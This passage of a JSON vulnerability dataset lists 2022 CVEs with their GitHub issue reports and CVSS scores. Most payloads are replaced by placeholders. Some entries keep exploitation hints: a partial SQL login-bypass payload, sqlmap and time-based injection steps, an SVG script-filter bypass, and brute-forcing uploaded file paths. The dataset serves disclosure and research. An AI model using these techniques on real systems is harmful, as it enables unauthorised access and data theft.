  79321. "description": "MCMS NUMBERTAG SQLI. A suspicious point was found in the APITAG file APITAG Since the id of select maps to a method in Java, and this XML corresponds to Content, we looked directly in APITAG and found a call to APITAG Next we try to inject, see the top class definition of APITAG of the file, we can know that the route is APITAG , and then Adding the method to be called, we can get the route as APITAG , and from the placeholder of APITAG , we can know that the suspicious injection point is APITAG , and then try to inject CODETAG APITAG As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run APITAG APITAG APITAG APITAG",
  79322. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79323. "severity": "CRITICAL",
  79324. "baseScore": 9.8,
  79325. "impactScore": 5.9,
  79326. "exploitabilityScore": 3.9
  79327. },
  79328. {
  79329. "CVE_ID": "CVE-2022-23899",
  79330. "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/63",
  79331. "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/63",
  79332. "Repo_new": "ming-soft/mcms",
  79333. "Issue_Created_At": "2022-01-20T13:42:42Z",
  79334. "description": "MCMS NUMBERTAG PATHTAG SQLI. As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run APITAG Look up for field and find the incoming parameter APITAG Since the parameter names are directly concatenated into strings without filtering, then there may be a loophole, so let's move on to the next data chain APITAG APITAG Since the parameter names are directly concatenated into strings without filtering, then there may be a loophole, so let's move on to the next data chain APITAG APITAG This block was found to have database calls APITAG Next we try to inject, see the file APITAG at the top of the class definition, you can know the route is APITAG , and then add the method to be called, you can get the route is APITAG , next try to inject ERRORTAG APITAG Next I wrote a py file for convenient validation, using delayed injection ERRORTAG",
  79335. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79336. "severity": "CRITICAL",
  79337. "baseScore": 9.8,
  79338. "impactScore": 5.9,
  79339. "exploitabilityScore": 3.9
  79340. },
  79341. {
  79342. "CVE_ID": "CVE-2022-23901",
  79343. "Issue_Url_old": "https://github.com/skvadrik/re2c/issues/394",
  79344. "Issue_Url_new": "https://github.com/skvadrik/re2c/issues/394",
  79345. "Repo_new": "skvadrik/re2c",
  79346. "Issue_Created_At": "2022-01-20T14:10:13Z",
  79347. "description": "Stack overflow due to recursion in re2c/ APITAG /dead_rules.cc. Operating System Version\uff1aubuntu NUMBERTAG re2c version NUMBERTAG error function\uff1are2c::backprop NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffdf3f NUMBERTAG ff8 (pc NUMBERTAG f8e0 bp NUMBERTAG sp NUMBERTAG ffdf3f NUMBERTAG T NUMBERTAG f8e0 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG APITAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG APITAG stack overflow PATHTAG in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) Test example link\uff1a URLTAG url Run the following command to repeat the error\uff1a $ ./re2c example",
  79348. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79349. "severity": "CRITICAL",
  79350. "baseScore": 9.8,
  79351. "impactScore": 5.9,
  79352. "exploitabilityScore": 3.9
  79353. },
  79354. {
  79355. "CVE_ID": "CVE-2022-23903",
  79356. "Issue_Url_old": "https://github.com/pearadmin/pear-admin-think/issues/1",
  79357. "Issue_Url_new": "https://github.com/pearadmin/pear-admin-think/issues/1",
  79358. "Repo_new": "pearadmin/pear-admin-think",
  79359. "Issue_Created_At": "2022-01-21T04:34:40Z",
  79360. "description": "There is a stored xss vulnerability in pear admin think APITAG Backend Log the xss will be executed FILETAG APITAG Code execution] true",
  79361. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  79362. "severity": "MEDIUM",
  79363. "baseScore": 5.4,
  79364. "impactScore": 2.7,
  79365. "exploitabilityScore": 2.3
  79366. },
  79367. {
  79368. "CVE_ID": "CVE-2022-24032",
  79369. "Issue_Url_old": "https://github.com/jdordonezn/CVE-2022-24032/issues/1",
  79370. "Issue_Url_new": "https://github.com/jdordonezn/cve-2022-24032/issues/1",
  79371. "Repo_new": "jdordonezn/CVE-2022-24032",
  79372. "Issue_Created_At": "2022-01-29T14:32:48Z",
  79373. "description": "User enumeration in APITAG APITAG NUMBERTAG APITAG APITAG through NUMBERTAG is vulnerable to user enumeration. An attacker can identify valid usernames on the platform because a failed login attempt produces a different error message when the username is valid. APITAG NUMBERTAG Login attempt with invalid username FILETAG NUMBERTAG Login attempt with valid username FILETAG",
  79374. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  79375. "severity": "MEDIUM",
  79376. "baseScore": 5.3,
  79377. "impactScore": 1.4,
  79378. "exploitabilityScore": 3.9
  79379. },
  79380. {
  79381. "CVE_ID": "CVE-2022-24123",
  79382. "Issue_Url_old": "https://github.com/marktext/marktext/issues/2946",
  79383. "Issue_Url_new": "https://github.com/marktext/marktext/issues/2946",
  79384. "Repo_new": "marktext/marktext",
  79385. "Issue_Created_At": "2022-01-28T05:24:24Z",
  79386. "description": "XSS to RCE vulnerability in Mermaid rendered. APITAG Description APITAG According to URLTAG , it will add a closing element at the end, which means it tries to parse it as HTML. FILETAG Versions APITAG version NUMBERTAG Operating system: APITAG NUMBERTAG",
  79387. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
  79388. "severity": "CRITICAL",
  79389. "baseScore": 9.0,
  79390. "impactScore": 6.0,
  79391. "exploitabilityScore": 2.3
  79392. },
  79393. {
  79394. "CVE_ID": "CVE-2022-24124",
  79395. "Issue_Url_old": "https://github.com/casdoor/casdoor/issues/439",
  79396. "Issue_Url_new": "https://github.com/casdoor/casdoor/issues/439",
  79397. "Repo_new": "casdoor/casdoor",
  79398. "Issue_Created_At": "2022-01-22T09:53:09Z",
  79399. "description": "SQL injection vulnerability in field filter. The query API provides the field and value parameters to support query by field. It inserts the user's input into the raw SQL expression which can lead to a SQL injection vulnerability. APITAG And the APITAG is a public route that everyone can visit. Proof of concept: APITAG",
  79400. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79401. "severity": "HIGH",
  79402. "baseScore": 7.5,
  79403. "impactScore": 3.6,
  79404. "exploitabilityScore": 3.9
  79405. },
  79406. {
  79407. "CVE_ID": "CVE-2022-24135",
  79408. "Issue_Url_old": "https://github.com/78778443/QingScan/issues/17",
  79409. "Issue_Url_new": "https://github.com/78778443/qingscan/issues/17",
  79410. "Repo_new": "78778443/qingscan",
  79411. "Issue_Created_At": "2022-01-24T07:41:45Z",
  79412. "description": "Search function Cross Site Script(XSS) Vulnerability. XSS Payload APITAG There is an xss vulnerability in all search functions. Since there are many locations, only three locations are provided to prove the existence of the vulnerability URL\uff1a \u83dc\u5355\u7ba1\u7406 URLTAG FILETAG URL\uff1a python\u4f9d\u8d56\u5e93 URLTAG FILETAG URL\uff1a hydra\u5217\u8868 URLTAG FILETAG",
  79413. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79414. "severity": "MEDIUM",
  79415. "baseScore": 6.1,
  79416. "impactScore": 2.7,
  79417. "exploitabilityScore": 2.8
  79418. },
  79419. {
  79420. "CVE_ID": "CVE-2022-24177",
  79421. "Issue_Url_old": "https://github.com/zhao1231/cve_payload/issues/1",
  79422. "Issue_Url_new": "https://github.com/zhao1231/cve_payload/issues/1",
  79423. "Repo_new": "zhao1231/cve_payload",
  79424. "Issue_Created_At": "2022-02-09T03:38:05Z",
  79425. "description": "Ex libris_xss vulnerability. aaaa",
  79426. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79427. "severity": "MEDIUM",
  79428. "baseScore": 6.1,
  79429. "impactScore": 2.7,
  79430. "exploitabilityScore": 2.8
  79431. },
  79432. {
  79433. "CVE_ID": "CVE-2022-24181",
  79434. "Issue_Url_old": "https://github.com/pkp/pkp-lib/issues/7649",
  79435. "Issue_Url_new": "https://github.com/pkp/pkp-lib/issues/7649",
  79436. "Repo_new": "pkp/pkp-lib",
  79437. "Issue_Created_At": "2022-01-25T21:29:50Z",
  79438. "description": "Add support for limiting allowed hosts. PATHTAG currently uses the APITAG , APITAG , and APITAG headers to detect the current hostname for formulating absolute URLs. Per URLTAG these headers may be user controlled and thus not trustworthy. This could be used to e.g. send password reset emails with poisoned links that direct the user to a NUMBERTAG rd party site, where the reset hash can be captured. Add support for a configuration file based whitelist of allowed hosts; the PATHTAG should pass the host through this filter before using it.",
  79439. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79440. "severity": "MEDIUM",
  79441. "baseScore": 6.1,
  79442. "impactScore": 2.7,
  79443. "exploitabilityScore": 2.8
  79444. },
  79445. {
  79446. "CVE_ID": "CVE-2022-24193",
  79447. "Issue_Url_old": "https://github.com/IceWhaleTech/CasaOS/issues/84",
  79448. "Issue_Url_new": "https://github.com/icewhaletech/casaos/issues/84",
  79449. "Repo_new": "icewhaletech/casaos",
  79450. "Issue_Created_At": "2022-01-26T07:30:28Z",
  79451. "description": "A security vulnerability which will lead to controller the system. Describe the bug Here is a security vulnerability will lead to controller the system. Detail URLTAG and the password is sent to Guan. EMAILTAG .",
  79452. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79453. "severity": "CRITICAL",
  79454. "baseScore": 9.8,
  79455. "impactScore": 5.9,
  79456. "exploitabilityScore": 3.9
  79457. },
  79458. {
  79459. "CVE_ID": "CVE-2022-24223",
  79460. "Issue_Url_old": "https://github.com/thedigicraft/Atom.CMS/issues/255",
  79461. "Issue_Url_new": "https://github.com/thedigicraft/atom.cms/issues/255",
  79462. "Repo_new": "thedigicraft/atom.cms",
  79463. "Issue_Created_At": "2022-01-28T11:37:41Z",
  79464. "description": "i think there's a Sql injection in FILETAG . In APITAG APITAG i post: APITAG NUMBERTAG password NUMBERTAG then, I can log in to the system with the wrong password",
  79465. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79466. "severity": "CRITICAL",
  79467. "baseScore": 9.8,
  79468. "impactScore": 5.9,
  79469. "exploitabilityScore": 3.9
  79470. },
  79471. {
  79472. "CVE_ID": "CVE-2022-24229",
  79473. "Issue_Url_old": "https://github.com/ONLYOFFICE/document-server-integration/issues/252",
  79474. "Issue_Url_new": "https://github.com/onlyoffice/document-server-integration/issues/252",
  79475. "Repo_new": "onlyoffice/document-server-integration",
  79476. "Issue_Created_At": "2022-01-28T06:54:33Z",
  79477. "description": "FILETAG FILETAG Vulnerability param: type Vulnerability URL: URLTAG FILETAG FILETAG Vulnerability param: lang Vulnerability URL: URLTAG FILETAG FILETAG Vulnerability Solution Close the test example in Document Server",
  79478. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  79479. "severity": "MEDIUM",
  79480. "baseScore": 6.1,
  79481. "impactScore": 2.7,
  79482. "exploitabilityScore": 2.8
  79483. },
  79484. {
  79485. "CVE_ID": "CVE-2022-24249",
  79486. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2081",
  79487. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2081",
  79488. "Repo_new": "gpac/gpac",
  79489. "Issue_Created_At": "2022-01-28T10:38:34Z",
  79490. "description": "Null Pointer Dereference when dealing with APITAG version info : CODETAG poc : poc URLTAG command : APITAG hint out /dev/null $poc$ crash : ERRORTAG Here is the trace reported by debugging. We can see that the memcpy function is called on line NUMBERTAG of APITAG , which will copy the contents of the second parameter data to the buffer pointed to by the first parameter. Unfortunately, in this trace the data is NUMBERTAG NULL), causing the program to crash. CODETAG I tracked the null assignment of data in APITAG . APITAG is initialized to NULL in line NUMBERTAG When the value of APITAG is greater than NUMBERTAG line NUMBERTAG the program will allocate a memory chunk to APITAG ( line NUMBERTAG Otherwise, APITAG will remain NULL and will be assigned to APITAG in line NUMBERTAG In my crash, APITAG was set to NUMBERTAG causing APITAG to be NULL. The tag is then added to APITAG for subsequent access ( line NUMBERTAG URLTAG When the program executes to APITAG , it will get a tag from APITAG ( line NUMBERTAG and pass APITAG to the second parameter of APITAG ( line NUMBERTAG which eventually results in data being NULL. Although the program judges whether APITAG is NUMBERTAG in line NUMBERTAG it does not change the execution flow of the program and the value of APITAG . URLTAG Hope my analysis will help.",
  79491. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79492. "severity": "MEDIUM",
  79493. "baseScore": 5.5,
  79494. "impactScore": 3.6,
  79495. "exploitabilityScore": 1.8
  79496. },
  79497. {
  79498. "CVE_ID": "CVE-2022-24263",
  79499. "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/17",
  79500. "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/17",
  79501. "Repo_new": "kishan0725/hospital-management-system",
  79502. "Issue_Created_At": "2022-01-25T17:07:00Z",
  79503. "description": "Bypass authentication with SQL Injection. VULNERABLE: SQL Injection Authentication Bypass exists in Hospital Management System. An attacker can inject query in PATHTAG via the \u2018email\u2019 parameters. + Description: The vulnerability is present in the PATHTAG \" , and can be exploited throuth a POST request via the \u2018email\u2019 parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload: email =' or NUMBERTAG limit NUMBERTAG File affect: + FILETAG + Proof of concept (POC): + Inject payload: + FILETAG + Bypass authentication success and redirect admin panel + FILETAG",
  79504. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79505. "severity": "CRITICAL",
  79506. "baseScore": 9.8,
  79507. "impactScore": 5.9,
  79508. "exploitabilityScore": 3.9
  79509. },
  79510. {
  79511. "CVE_ID": "CVE-2022-24264",
  79512. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/13",
  79513. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/13",
  79514. "Repo_new": "cuppacms/cuppacms",
  79515. "Issue_Created_At": "2022-01-03T11:13:24Z",
  79516. "description": "VULNERABLE: SQL injection vulnerability exists in APITAG PATHTAG via the \u2018search_word\u2019 parameters. + VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the \u2018search_word\u2019 parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Email: EMAILTAG + Product: APITAG + Description: The vulnerability is present in the PATHTAG , and can be exploited throuth a POST request via the \u2018search_word\u2019 parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload: ERRORTAG + Proof of concept (POC): FILETAG + You can see injection code query into search_word parameters as show below + Request: FILETAG + You see version , database and data as show below + Response: FILETAG + Request and Response: FILETAG + Report: FILETAG",
  79517. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79518. "severity": "HIGH",
  79519. "baseScore": 7.5,
  79520. "impactScore": 3.6,
  79521. "exploitabilityScore": 3.9
  79522. },
  79523. {
  79524. "CVE_ID": "CVE-2022-24265",
  79525. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/14",
  79526. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/14",
  79527. "Repo_new": "cuppacms/cuppacms",
  79528. "Issue_Created_At": "2022-01-04T10:07:38Z",
  79529. "description": "SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the PATHTAG parameters.. + VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the PATHTAG parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Email: EMAILTAG + Product: APITAG + Description: The vulnerability is present in the PATHTAG , and can be exploited throuth a POST request via the PATHTAG parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Payload Boolean true: PATHTAG and NUMBERTAG Payload Boolean false: PATHTAG and NUMBERTAG Payload exploit example: PATHTAG and APITAG + Payload exploit: PATHTAG and APITAG + Proof of concept (POC): + Payload Boolean true: PATHTAG and NUMBERTAG Request and Response: FILETAG + Payload Boolean false: PATHTAG and NUMBERTAG Request and Response: FILETAG + Exploit: FILETAG FILETAG + Report: FILETAG",
  79530. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79531. "severity": "HIGH",
  79532. "baseScore": 7.5,
  79533. "impactScore": 3.6,
  79534. "exploitabilityScore": 3.9
  79535. },
  79536. {
  79537. "CVE_ID": "CVE-2022-24266",
  79538. "Issue_Url_old": "https://github.com/CuppaCMS/CuppaCMS/issues/17",
  79539. "Issue_Url_new": "https://github.com/cuppacms/cuppacms/issues/17",
  79540. "Repo_new": "cuppacms/cuppacms",
  79541. "Issue_Created_At": "2022-01-06T15:19:45Z",
  79542. "description": "Time based SQL Injection PATHTAG via the \u2018order_by\u2019 parameters.. + VULNERABLE: SQL injection vulnerability exists in APITAG An attacker can inject query in PATHTAG via the \u2018order_by\u2019 parameters. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac + Contact me: + Github: URLTAG + Facebook: URLTAG + Email: EMAILTAG + Product: APITAG + Description: The vulnerability is present in the PATHTAG , and can be exploited throuth a POST request via the \u2018order_by\u2019 parameters. + Impact: Allow attacker inject query and access , disclosure of all data on the system. + Suggestions: User input should be filter, Escaping and Parameterized Queries. + Proof of concept (POC): File report: URLTAG Video Poc: URLTAG",
  79543. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  79544. "severity": "HIGH",
  79545. "baseScore": 7.5,
  79546. "impactScore": 3.6,
  79547. "exploitabilityScore": 3.9
  79548. },
  79549. {
  79550. "CVE_ID": "CVE-2022-24278",
  79551. "Issue_Url_old": "https://github.com/neocotic/convert-svg/issues/86",
  79552. "Issue_Url_new": "https://github.com/neocotic/convert-svg/issues/86",
  79553. "Repo_new": "neocotic/convert-svg",
  79554. "Issue_Created_At": "2022-06-06T17:56:18Z",
  79555. "description": "Remote Code Injection vulnerable. I found the issue from version NUMBERTAG The issue is that it sanitizes svg tag only once time. so I add another svg tag which is APITAG before the original payload that I used before. CODETAG It's still vulnerable to remote code injection with directory traversal vulnerability.",
  79556. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79557. "severity": "CRITICAL",
  79558. "baseScore": 9.8,
  79559. "impactScore": 5.9,
  79560. "exploitabilityScore": 3.9
  79561. },
  79562. {
  79563. "CVE_ID": "CVE-2022-24429",
  79564. "Issue_Url_old": "https://github.com/neocotic/convert-svg/issues/84",
  79565. "Issue_Url_new": "https://github.com/neocotic/convert-svg/issues/84",
  79566. "Repo_new": "neocotic/convert-svg",
  79567. "Issue_Created_At": "2022-06-03T05:22:40Z",
  79568. "description": "Remote Code Injection vulnerable. Affected versions of this package are vulnerable to Remote Code Injection. Using a specially crafted SVG file, an attacker could read arbitrary files from the file system and then show the file content as a converted PNG file. FILETAG I've tested on NUMBERTAG ersion at the latest version. I've saw that the code patched with removing \"onload\" attribute at svg tag. But that was not enough to prevent script execution. I bypass it with \"onfocus\" attribute with \"autofocus\" attribute on svg tag. And with many other svg tags for waiting execution of scripts that assigned in onfocus attribute. Payload CODETAG I checked on the latest version. FILETAG Latest version on NPM FILETAG",
  79569. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  79570. "severity": "HIGH",
  79571. "baseScore": 7.8,
  79572. "impactScore": 5.9,
  79573. "exploitabilityScore": 1.8
  79574. },
  79575. {
  79576. "CVE_ID": "CVE-2022-24434",
  79577. "Issue_Url_old": "https://github.com/mscdex/busboy/issues/250",
  79578. "Issue_Url_new": "https://github.com/mscdex/busboy/issues/250",
  79579. "Repo_new": "mscdex/busboy",
  79580. "Issue_Created_At": "2021-08-05T18:27:04Z",
  79581. "description": "Security alert: Busboy can crash on manipulated multipart/form data header names. I already wrote a PR for this problem. which is actually a problem of Dicer which busboy uses. For more information see mscdex/dicer NUMBERTAG",
  79582. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  79583. "severity": "HIGH",
  79584. "baseScore": 7.5,
  79585. "impactScore": 3.6,
  79586. "exploitabilityScore": 3.9
  79587. },
  79588. {
  79589. "CVE_ID": "CVE-2022-24553",
  79590. "Issue_Url_old": "https://github.com/zfaka-plus/zfaka/issues/260",
  79591. "Issue_Url_new": "https://github.com/zfaka-plus/zfaka/issues/260",
  79592. "Repo_new": "zfaka-plus/zfaka",
  79593. "Issue_Created_At": "2022-01-31T03:17:01Z",
  79594. "description": "Zfaka Backend APITAG version). in the background file upload, Zfaka only has one JS check in PATHTAG there is no filtering for the file extension, and there is only one front end JS verification, So disabling JS can directly implement the background rce FILETAG The controller of upload in the background is located in PATHTAG The upload path will not be returned after the file is uploaded, but we already know the upload path and the naming rules of the uploaded file FILETAG UPLOAD_ Path is defined as follows APITAG CUR_ Date is defined as follows APITAG file name APITAG Taking NUMBERTAG as an example, the output results are as follows FILETAG Take NUMBERTAG on May NUMBERTAG as an example The full file path is APITAG Construct form directly CODETAG At the same time, you need to add referers: URLTAG , and modify the Otherwise, \"please select product ID\" will be prompted Finally, the complete upload HTTP request is as follows ERRORTAG Direct upload succeeded Then run the last seconds with burpsuite intruder After all, the number of seconds can't be so accurate FILETAG FILETAG",
  79595. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79596. "severity": "CRITICAL",
  79597. "baseScore": 9.8,
  79598. "impactScore": 5.9,
  79599. "exploitabilityScore": 3.9
  79600. },
  79601. {
  79602. "CVE_ID": "CVE-2022-24568",
  79603. "Issue_Url_old": "https://github.com/201206030/novel-plus/issues/80",
  79604. "Issue_Url_new": "https://github.com/201206030/novel-plus/issues/80",
  79605. "Repo_new": "201206030/novel-plus",
  79606. "Issue_Created_At": "2022-02-01T16:38:03Z",
  79607. "description": "novel plus NUMBERTAG can be attacked by SSRF. Exploit Step NUMBERTAG isit the following page APITAG Step NUMBERTAG type the information in the picture FILETAG Code Analysis URLTAG URLTAG That means attacker can request intranet resource (such as novel admin)",
  79608. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  79609. "severity": "CRITICAL",
  79610. "baseScore": 9.8,
  79611. "impactScore": 5.9,
  79612. "exploitabilityScore": 3.9
  79613. },
  79614. {
  79615. "CVE_ID": "CVE-2022-24575",
  79616. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2058",
  79617. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2058",
  79618. "Repo_new": "gpac/gpac",
  79619. "Issue_Created_At": "2022-01-21T08:54:48Z",
  79620. "description": "Use After Free. ERRORTAG",
  79621. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  79622. "severity": "HIGH",
  79623. "baseScore": 7.8,
  79624. "impactScore": 5.9,
  79625. "exploitabilityScore": 1.8
  79626. },
  79627. {
  79628. "CVE_ID": "CVE-2022-24576",
  79629. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2061",
  79630. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2061",
  79631. "Repo_new": "gpac/gpac",
  79632. "Issue_Created_At": "2022-01-21T08:56:18Z",
  79633. "description": "Heap based Buffer Overflow. ERRORTAG",
  79634. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  79635. "severity": "MEDIUM",
  79636. "baseScore": 5.5,
  79637. "impactScore": 3.6,
  79638. "exploitabilityScore": 1.8
  79639. },
  79640. {
  79641. "CVE_ID": "CVE-2022-24594",
  79642. "Issue_Url_old": "https://github.com/walinejs/waline/issues/785",
  79643. "Issue_Url_new": "https://github.com/walinejs/waline/issues/785",
  79644. "Repo_new": "walinejs/waline",
  79645. "Issue_Created_At": "2022-01-30T01:15:54Z",
  79646. "description": "APITAG waline fake any ip vulnerability. \u95ee\u9898\u63cf\u8ff0 | Describe the bug URLTAG \u95ee\u9898\u7f51\u7ad9 | Website URL FILETAG \u670d\u52a1\u90e8\u7f72\u5728\u54ea\u91cc\uff1f | Where your waline deploy? Vercel APITAG \u6570\u636e\u5b58\u50a8\u5728\u54ea\u91cc\uff1f| Where your comment data store? APITAG FILETAG",
  79647. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  79648. "severity": "MEDIUM",
  79649. "baseScore": 5.3,
  79650. "impactScore": 1.4,
  79651. "exploitabilityScore": 3.9
  79652. },
  79653. {
  79654. "CVE_ID": "CVE-2022-24599",
  79655. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/60",
  79656. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/60",
  79657. "Repo_new": "mpruett/audiofile",
  79658. "Issue_Created_At": "2022-02-02T13:25:06Z",
  79659. "description": "Memory leak bug in printfileinfo, in printinfo.c. There exists one Memory leak bug in printfileinfo, in printinfo.c, which allows an attacker to leak the address of heap or libc via a crafted file. To reproduce with the attached poc file: FILETAG Heap address leak: ./sfinfo . APITAG APITAG the output of Copyright): ERRORTAG Libc address leak: ./sfinfo . APITAG APITAG the output of Copyright): ERRORTAG This vulnerability can be triggered anywhere the printfileinfo function is called, for example, sfconvert. The poc.py will help you to calculate the address, which is test on Ubuntu NUMBERTAG python2. Usage of poc.py: CODETAG The audiofile project is built with: APITAG",
  79660. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  79661. "severity": "MEDIUM",
  79662. "baseScore": 6.5,
  79663. "impactScore": 3.6,
  79664. "exploitabilityScore": 2.8
  79665. },
  79666. {
  79667. "CVE_ID": "CVE-2022-24612",
  79668. "Issue_Url_old": "https://github.com/EyesOfNetworkCommunity/eonweb/issues/114",
  79669. "Issue_Url_new": "https://github.com/eyesofnetworkcommunity/eonweb/issues/114",
  79670. "Repo_new": "eyesofnetworkcommunity/eonweb",
  79671. "Issue_Created_At": "2022-02-03T00:58:30Z",
  79672. "description": "APITAG Hello, Il y a un petit soucis dans le contr\u00f4le des fichiers upload\u00e9s via le file upload du module ITSM. La possibilit\u00e9 d'uploader du format XML devrait se suivre d'un contr\u00f4le du dit fichier, en l'\u00e9tat il est possible d'uploader (via un user authentifi\u00e9), un document XML contenant une XSS ou d'autres joyeuset\u00e9es malicieuses. FILETAG",
  79673. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  79674. "severity": "MEDIUM",
  79675. "baseScore": 5.4,
  79676. "impactScore": 2.7,
  79677. "exploitabilityScore": 2.3
  79678. },
  79679. {
  79680. "CVE_ID": "CVE-2022-24613",
  79681. "Issue_Url_old": "https://github.com/drewnoakes/metadata-extractor/issues/561",
  79682. "Issue_Url_new": "https://github.com/drewnoakes/metadata-extractor/issues/561",
  79683. "Repo_new": "drewnoakes/metadata-extractor",
  79684. "Issue_Created_At": "2021-12-10T19:26:48Z",
  79685. "description": "A list of bugs found NUMBERTAG bugs in total NUMBERTAG Unique Bugs Found Recently we ( Zhang Cen URLTAG and Huang Wenjie URLTAG discovered a series of bugs in latest metadta extractor NUMBERTAG Every bug we reported in the following is unique and reproducable. We sorted and refined them from thousands of crashes. Furthermore, they have been manually analyzed and triaged in removing the duplicates. APITAG Due to the lack of contextual knowledge in the metadta extractor library, we cannot thoroughly fix some bugs hence we look forward to any proposed plan from the developers in fixing these bugs NUMBERTAG Bug Report and Crash Seeds The bug report folder can be downloaded from URLTAG It contains both reports and crash seeds NUMBERTAG Test Program to Reproduce Crashes The test program can be downloaded from URLTAG Total NUMBERTAG bugs are reported in this pull request. A full list is provided below NUMBERTAG Folder Structure Level NUMBERTAG folder): exception type Level NUMBERTAG folder): error location Level NUMBERTAG files): POC file and FILETAG including reproducing steps NUMBERTAG FILETAG content NUMBERTAG Exception type NUMBERTAG Error location NUMBERTAG Bug cause and impact NUMBERTAG Crash thread's stacks NUMBERTAG Steps to reproduce NUMBERTAG Bug Full List etadata extractor_reported_crashes \u251c\u2500\u2500 ERRORTAG \u2502\u00a0\u00a0 \u2514\u2500\u2500 APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 \u251c\u2500\u2500 APITAG APITAG NUMBERTAG APITAG APITAG NUMBERTAG ERRORTAG \u2502\u00a0\u00a0 